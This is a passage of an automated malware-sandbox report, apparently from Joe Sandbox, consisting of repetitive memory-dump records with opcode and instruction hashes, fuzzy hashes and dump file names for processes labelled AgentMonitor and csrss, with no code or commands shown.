                                      • Instruction ID: 3b482b9fcc3bcccf28723a60726902d8b2dabfb5933007a8dcb7e9b8188fb4c9
                                      • Opcode Fuzzy Hash: 2f25fe49d7a184dc323016da05f6dfba3d16729e3f581a1f80cc04399d300f9d
                                      • Instruction Fuzzy Hash: 33E0656154E7C14FDB19AA7484684547F60EF6724178941EEC055CF197DA1D8C89C741
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Instruction Fuzzy Hash: 2ED01234B949044F8B0CBE38C8998747395EB6A216BA540E9D00AC72B1D96ADC89C741
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae10000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c3b7aab64dee838a295e689a3a798708cac2788130635451790f04a3e475d4e4
                                      • Instruction ID: fe22828c588cfddbaea4adf16c034d2e6fb1e10eaf42f83b0b44b4f670da0d70
                                      • Opcode Fuzzy Hash: c3b7aab64dee838a295e689a3a798708cac2788130635451790f04a3e475d4e4
                                      • Instruction Fuzzy Hash: 4CC08CE0DCF53F00B4407D3ED7020BCA908BBC8220FF000F3C02C80085AC4D20D50146
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae10000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction ID: 38a35cc4f78d43621fd59b677c9d7cf33c0390bd8621f7ac56e61f66798fa5de
                                      • Opcode Fuzzy Hash: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction Fuzzy Hash: EBC08C304548088FC948FF38C88482437A0FB0D214BE100D0E009CB170E219DCC0C740
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae10000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 66fd9c95d9fb302f4d8d08252d0259f79ed687d58519ba32e8e14782fa9f980c
                                      • Instruction ID: 0982063ab03a394c61e729939bbac197cca64aa79e58cad3533420b5371e1b8e
                                      • Opcode Fuzzy Hash: 66fd9c95d9fb302f4d8d08252d0259f79ed687d58519ba32e8e14782fa9f980c
                                      • Instruction Fuzzy Hash: 00C08CC0F0EC2B53F12B3628D12127E0842AF40700FE00078E42ED22CECE0E1A221282
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae10000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction ID: 81c2a12a3cbd04e33625413bd8526c532172944c35fe772657fb1c371c661f8b
                                      • Opcode Fuzzy Hash: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction Fuzzy Hash: C1B01290CDE43F00B4047D7A4A42074B844BB88100FF400F0D41C80085E88D14A40242
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae10000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction ID: 5a808540bb85373f25323aeca6513dfecf496581c33cce77687c690daf4d83f2
                                      • Opcode Fuzzy Hash: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction Fuzzy Hash:
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae10000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: c9$!k9$"s9$#{9
                                      • API String ID: 0-1692736845
                                      • Opcode ID: e8937fa86d39937fabd692b3136fc44fc5e96aa5befe0eb9dfa70bf790ed1f41
                                      • Instruction ID: b025d66e3f5e36446bec3f6354de4736c738368f86a47395ebb5d53150d88d65
                                      • Opcode Fuzzy Hash: e8937fa86d39937fabd692b3136fc44fc5e96aa5befe0eb9dfa70bf790ed1f41
                                      • Instruction Fuzzy Hash: 1151C2D7A0E63285E11336FCF4011FD5B4C9F81275B1886B7DA4E990878E8861BB92F5
                                      • Snapshot File: hcaresult_39_2_7ffb4ae20000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7e471e81c6b45092eedc3f19c432f80fa60a2bfd64c0720f2ffd0576fe2c90d9
                                      • Instruction ID: 16c58ca300ab8019f2e292987bb144fd14711a701125f9fe59fe1e873f9ea3fb
                                      • Opcode Fuzzy Hash: 7e471e81c6b45092eedc3f19c432f80fa60a2bfd64c0720f2ffd0576fe2c90d9
                                      • Instruction Fuzzy Hash: 9B01A5B0D5C9698FDBD4FF28C995BA8B6A1FB68300F2041E5D41DD3285CE3869858F41
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae20000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 33ad95c031b5cb018e629114cb2faec1cf01f8ee115a59977accfe8bff6c84a0
                                      • Instruction ID: 2ea1fe3ee4721c6ac62d3cbdf494fea951a6b4f256d9f848cf8c1f432781f854
                                      • Opcode Fuzzy Hash: 33ad95c031b5cb018e629114cb2faec1cf01f8ee115a59977accfe8bff6c84a0
                                      • Instruction Fuzzy Hash: 9FF054B2A5C95B4BF755BE2CD9606B93298FF19310F3542F5E43DC71C6EE28E8014682
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 970110386a28ea33e9809645a5f1e35a4c155356219b7c1b0415452638871267
                                      • Instruction ID: eb08d1d0e9e519e8c34edc9bc61880866140a6f7e2ac57b6a0f11600102a4089
                                      • Opcode Fuzzy Hash: 970110386a28ea33e9809645a5f1e35a4c155356219b7c1b0415452638871267
                                      • Instruction Fuzzy Hash: 00F0E522B4DBC84FC729AA2D4869061BFF5DB9B21234941FFC496C72E3ED58AC858341
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 954d8d318abeaa0d577ff7ffd884ea5b9a5c9026ffd804b41dfb8a5485d24aff
                                      • Instruction ID: 8343a8f57aa2d6b753f8121c5a043b9854e683e5299485d6a50963d94df6e1bf
                                      • Opcode Fuzzy Hash: 954d8d318abeaa0d577ff7ffd884ea5b9a5c9026ffd804b41dfb8a5485d24aff
                                      • Instruction Fuzzy Hash: 29F0B472A489158FE3A4BE18C4547A873DAFB94364F690176D029C3195DE6868815740
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fd2acc4e6946023a8cb6fad64d094354f4de3d9796f7a4bc323960c71169f6bb
                                      • Instruction ID: dd883564e53e479445ebf6156c541233331ba38a00a062757bf747cc0926c757
                                      • Opcode Fuzzy Hash: fd2acc4e6946023a8cb6fad64d094354f4de3d9796f7a4bc323960c71169f6bb
                                      • Instruction Fuzzy Hash: E0E02B7150E7C04FC705AA3484594947FA0EFA721134942EFC045CF1E3EA2CCC89C700
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8910096e4b25cd96ab5b91bd47d4cd416830b5c2c8e4fe302a4996d8faa950f5
                                      • Instruction ID: 1bab3d9375fd886bab1a6da384e0890cf31466f9860bcf7a427805b36666ecb0
                                      • Opcode Fuzzy Hash: 8910096e4b25cd96ab5b91bd47d4cd416830b5c2c8e4fe302a4996d8faa950f5
                                      • Instruction Fuzzy Hash: 14F0E57150E7C04FC706AA3888294507FA0EF6721134A46EFC045CF1E3EA2D8C88C701
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 07ccdd97c577f48f3941c78a66be06671470c693810cae01577c0ba69cc20537
                                      • Instruction ID: 1278add93ec383d6484bdd34daef4e51aa079da03f73c5c48dc2b686de4c3342
                                      • Opcode Fuzzy Hash: 07ccdd97c577f48f3941c78a66be06671470c693810cae01577c0ba69cc20537
                                      • Instruction Fuzzy Hash: 26F0A0A2D4DA6A8BF295BE2885192B81AD9FB18220F7981F7C86CC72E6DD0C1C414741
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4a4c35c1d2d2ffc1527e1e20dc18a91ecb7f6be5fddac640b694898b74ee93e9
                                      • Instruction ID: 90e3b4530d58e859959e78031070858628e3718b7be88cdb6309b45923bf29c3
                                      • Opcode Fuzzy Hash: 4a4c35c1d2d2ffc1527e1e20dc18a91ecb7f6be5fddac640b694898b74ee93e9
                                      • Instruction Fuzzy Hash: DEF03A74D48259DFEB10FF68C5845ADBFF0FF44300F3045A5D42197244EA345A448B80
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bc806d25676570f801b33c6ec84c7e6d88e510a59ceee20cd12a259cc2dd60c3
                                      • Instruction ID: 7d9b2f4199c3c34ede9515398215e465beb115fe01245bc273b6c29d1eed1104
                                      • Opcode Fuzzy Hash: bc806d25676570f801b33c6ec84c7e6d88e510a59ceee20cd12a259cc2dd60c3
                                      • Instruction Fuzzy Hash: 5CE0E56198E7D04FC74B9B7488688947FB4EE5722178A84EEC0898F1E3D669984AC742
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c315b5d5c893c893f62e841b520169d6e99c76195995479546504b0431bfa4e3
                                      • Instruction ID: 437ef8355eb90a2483f1e29550f55d8ce66b73da8277851049454e5fcd509aa5
                                      • Opcode Fuzzy Hash: c315b5d5c893c893f62e841b520169d6e99c76195995479546504b0431bfa4e3
                                      • Instruction Fuzzy Hash: 46E01A6284E7C04FCB0A9A7488A88903F64EF6721179A40EBC045CF5A3D9198849C701
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae20000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bc4a196b34808cfd6b84f2a57bb201bd680e12675eec2e2c3e975727098e516a
                                      • Instruction ID: 0070a4db9c6702c52058f24c164babd924dd2ad746f39f15433760fc5179e36d
                                      • Opcode Fuzzy Hash: bc4a196b34808cfd6b84f2a57bb201bd680e12675eec2e2c3e975727098e516a
                                      • Instruction Fuzzy Hash: 7BE04F73A8C41687E765BE20C5515BA3387BFD4354F3402F6D02A871C1EDBC66068642
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 42e5b016fa398c5436d0dc47638afbd19aa405c7bb2db29d5ccadb24c69579e5
                                      • Instruction ID: 0ee713b78647d20b527666bb102ad91e0ec0da5f6ac01c6a044c92693e35cf69
                                      • Opcode Fuzzy Hash: 42e5b016fa398c5436d0dc47638afbd19aa405c7bb2db29d5ccadb24c69579e5
                                      • Instruction Fuzzy Hash: 97E0ED70A4C1368AFB94BD24D9507B966A4FB85310F7440F89A5E933C2DD29AE448745
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c82bf6c9e263984fc9b5c7d0e90993a7ee158967d6b0a81b2148b56e3c0bc204
                                      • Instruction ID: 45e2eebe902de0fd7e1acde84c48574b031983042b5d42cafd33742a365dc4fd
                                      • Opcode Fuzzy Hash: c82bf6c9e263984fc9b5c7d0e90993a7ee158967d6b0a81b2148b56e3c0bc204
                                      • Instruction Fuzzy Hash: 2AE01A6294E7C44FC74BAB3488A89417F64AE1721174A40EBC085CF1F3D9199849C711
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae20000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4806e51048247fde821f6533b3498d0b21e3966a5f0dc8d16b9f49d73ddff0f2
                                      • Instruction ID: 2468b9840001523653c5bbfdc41d1dbff6d49cd0cf196cdff2bda60ff2e3cb7c
                                      • Opcode Fuzzy Hash: 4806e51048247fde821f6533b3498d0b21e3966a5f0dc8d16b9f49d73ddff0f2
                                      • Instruction Fuzzy Hash: C6D0C930A649084F8B4CBA3C885997472D1EBAE216BE540A9D00AC72A1EA6AD889C741
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d31f381c67c792aa8b9a58807c947a1ed5e3463b8d19660a1fa6eb388fe299d9
                                      • Instruction ID: 9de1e2994fea26cdf7ad3255474e1c9d0e7d0ee054989b0168b0aa26bfda795c
                                      • Opcode Fuzzy Hash: d31f381c67c792aa8b9a58807c947a1ed5e3463b8d19660a1fa6eb388fe299d9
                                      • Instruction Fuzzy Hash: 26D01234B949044F870CBA38C85D8747395EB6A2177E544A9D00AC72B1D96ADC89CB81
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2917f0a7ebe4bb5b5e98b73bb87c05757e37cc19def6ec39ee00e5dc13468594
                                      • Instruction ID: 8f09ab4a651fb39573b1301ec7c35e3ecac32723bf79141849bfce3baf0314c2
                                      • Opcode Fuzzy Hash: 2917f0a7ebe4bb5b5e98b73bb87c05757e37cc19def6ec39ee00e5dc13468594
                                      • Instruction Fuzzy Hash: 2ED01234B949044F8B0CBE38C8998747395EB6A216BA540E9D00AC72B1D96ADC89C741
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c3b7aab64dee838a295e689a3a798708cac2788130635451790f04a3e475d4e4
                                      • Instruction ID: fe22828c588cfddbaea4adf16c034d2e6fb1e10eaf42f83b0b44b4f670da0d70
                                      • Opcode Fuzzy Hash: c3b7aab64dee838a295e689a3a798708cac2788130635451790f04a3e475d4e4
                                      • Instruction Fuzzy Hash: 4CC08CE0DCF53F00B4407D3ED7020BCA908BBC8220FF000F3C02C80085AC4D20D50146
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction ID: 38a35cc4f78d43621fd59b677c9d7cf33c0390bd8621f7ac56e61f66798fa5de
                                      • Opcode Fuzzy Hash: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction Fuzzy Hash: EBC08C304548088FC948FF38C88482437A0FB0D214BE100D0E009CB170E219DCC0C740
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b0b7baed9546aedf059e9c09341ca52bdce29be299150096c6c83c7b44ed500c
                                      • Instruction ID: 2ca786c2de6076960dbed5cf218fb85abcf9c31e1b73a1d3c0586f4d3fe9f410
                                      • Opcode Fuzzy Hash: b0b7baed9546aedf059e9c09341ca52bdce29be299150096c6c83c7b44ed500c
                                      • Instruction Fuzzy Hash: E8C08C80E0DC2A53F12B3628C22127E04629F40700FE40078E42EE22CECE0E19221282
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction ID: 81c2a12a3cbd04e33625413bd8526c532172944c35fe772657fb1c371c661f8b
                                      • Opcode Fuzzy Hash: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction Fuzzy Hash: C1B01290CDE43F00B4047D7A4A42074B844BB88100FF400F0D41C80085E88D14A40242
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction ID: 5a808540bb85373f25323aeca6513dfecf496581c33cce77687c690daf4d83f2
                                      • Opcode Fuzzy Hash: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction Fuzzy Hash:
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000027.00000002.1980017911.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_39_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: c9$!k9$"s9$#{9
                                      • API String ID: 0-1692736845
                                      • Opcode ID: e8937fa86d39937fabd692b3136fc44fc5e96aa5befe0eb9dfa70bf790ed1f41
                                      • Instruction ID: b025d66e3f5e36446bec3f6354de4736c738368f86a47395ebb5d53150d88d65
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae20000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bc4a196b34808cfd6b84f2a57bb201bd680e12675eec2e2c3e975727098e516a
                                      • Instruction ID: 0070a4db9c6702c52058f24c164babd924dd2ad746f39f15433760fc5179e36d
                                      • Opcode Fuzzy Hash: bc4a196b34808cfd6b84f2a57bb201bd680e12675eec2e2c3e975727098e516a
                                      • Instruction Fuzzy Hash: 7BE04F73A8C41687E765BE20C5515BA3387BFD4354F3402F6D02A871C1EDBC66068642
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c82bf6c9e263984fc9b5c7d0e90993a7ee158967d6b0a81b2148b56e3c0bc204
                                      • Instruction ID: 45e2eebe902de0fd7e1acde84c48574b031983042b5d42cafd33742a365dc4fd
                                      • Opcode Fuzzy Hash: c82bf6c9e263984fc9b5c7d0e90993a7ee158967d6b0a81b2148b56e3c0bc204
                                      • Instruction Fuzzy Hash: 2AE01A6294E7C44FC74BAB3488A89417F64AE1721174A40EBC085CF1F3D9199849C711
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
